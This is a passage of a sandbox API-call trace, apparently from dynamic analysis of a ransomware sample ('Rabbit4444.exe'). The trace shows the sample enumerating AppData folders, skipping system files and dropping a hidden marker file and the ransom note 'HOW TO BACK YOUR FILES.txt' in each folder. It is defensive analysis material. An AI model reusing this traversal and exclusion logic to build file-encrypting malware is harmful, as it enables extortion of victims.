lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x715dffc9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xeaac4608, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0055.950] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.950] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.950] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.950] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.950] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x715dffc9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xeaac4608, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.950] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.950] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.950] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.950] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.950] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.950] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaac4608, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaac4608, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeaac4608, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.950] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.950] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.950] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e3170f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9cdd849c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0055.950] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.950] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.950] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0055.950] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0055.950] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0055.950] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0055.950] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0055.950] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0055.950] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0055.950] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0055.950] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0055.950] lstrcpyW (in: lpString1=0x130ebca, lpString2="AC" | out: lpString1="AC") returned="AC" [0055.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220c0 [0055.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x98) returned 0x113378 [0055.950] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220c8 | out: ListHead=0xf68b0, ListEntry=0x1220c8) returned 0x122328 [0055.951] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e31e63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9cdd849c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0055.951] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.951] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.951] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0055.951] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0055.951] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0055.951] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0055.951] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0055.951] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0055.951] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0055.951] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0055.951] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0055.951] lstrcpyW (in: lpString1=0x130ebca, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0055.951] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0055.951] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa2) returned 0x118f48 [0055.951] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x1220c8 [0055.951] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e32663, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9cdd849c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0055.951] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.951] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.951] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0055.951] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0055.951] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0055.951] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0055.951] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0055.951] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0055.951] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0055.951] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0055.951] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0055.951] lstrcpyW (in: lpString1=0x130ebca, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0055.951] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122140 [0055.951] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118b28 [0055.951] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122148 | out: ListHead=0xf68b0, ListEntry=0x122148) returned 0x122128 [0055.951] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e3325d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9cdd849c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0055.951] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.951] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.951] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0055.952] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0055.952] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0055.952] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0055.952] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0055.952] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0055.952] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0055.952] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0055.952] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0055.952] lstrcpyW (in: lpString1=0x130ebca, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0055.952] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0055.952] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118188 [0055.952] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x122148 [0055.952] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e342c7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9cdd849c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0055.952] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.952] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.952] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0055.952] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0055.952] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0055.952] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0055.952] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0055.952] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0055.952] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0055.952] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0055.952] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0055.952] lstrcpyW (in: lpString1=0x130ebca, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0055.952] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0055.952] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x123760 [0055.952] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x122308 [0055.952] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713d778b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x713d778b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0055.952] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.952] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.952] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0055.952] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0055.952] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0055.952] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0055.952] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0055.953] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0055.953] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0055.953] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0055.953] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0055.953] lstrcpyW (in: lpString1=0x130ebca, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0055.953] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221a0 [0055.953] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa4) returned 0x117ec8 [0055.953] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221a8 | out: ListHead=0xf68b0, ListEntry=0x1221a8) returned 0x122268 [0055.953] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715dffc9, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x715dffc9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x715dffc9, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0055.953] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.953] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.953] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0055.953] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0055.953] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0055.953] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0055.953] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0055.953] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0055.953] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0055.953] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0055.953] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0055.953] lstrcpyW (in: lpString1=0x130ebca, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0055.953] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221c0 [0055.953] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x123818 [0055.953] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221c8 | out: ListHead=0xf68b0, ListEntry=0x1221c8) returned 0x1221a8 [0055.953] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e8650f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9cdd849c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0055.953] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.953] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.953] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0055.953] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0055.953] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0055.953] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0055.953] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0055.953] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0055.953] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0055.954] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0055.954] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0055.954] lstrcpyW (in: lpString1=0x130ebca, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0055.954] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0055.954] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa6) returned 0x118708 [0055.954] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x1221c8 [0055.954] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e8650f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9cdd849c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0055.954] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0055.954] lstrcpyW (in: lpString1=0x130ebca, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.954] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.954] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.954] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.955] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.955] CloseHandle (hObject=0x278) returned 1 [0055.955] CloseHandle (hObject=0x27c) returned 1 [0055.955] GetCurrentThreadId () returned 0xd98 [0055.955] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0055.955] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState" [0055.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118708 | out: hHeap=0xe0000) returned 1 [0055.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0055.955] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState" [0055.955] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState\\" [0055.955] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0055.955] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.956] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.959] FlushFileBuffers (hFile=0x27c) returned 1 [0055.962] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.962] CloseHandle (hObject=0x27c) returned 1 [0055.962] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState") returned 82 [0055.962] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.962] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e8650f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeaac4608, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0055.963] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.963] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.963] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.963] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.963] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e8650f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeaac4608, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.963] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.963] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.963] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.963] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.963] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.963] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaac4608, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaac4608, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeaac4608, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.963] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.963] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.963] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaac4608, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaac4608, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeaac4608, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0055.963] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0055.963] lstrcpyW (in: lpString1=0x130ebde, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.963] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.963] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.964] MapViewOfFile 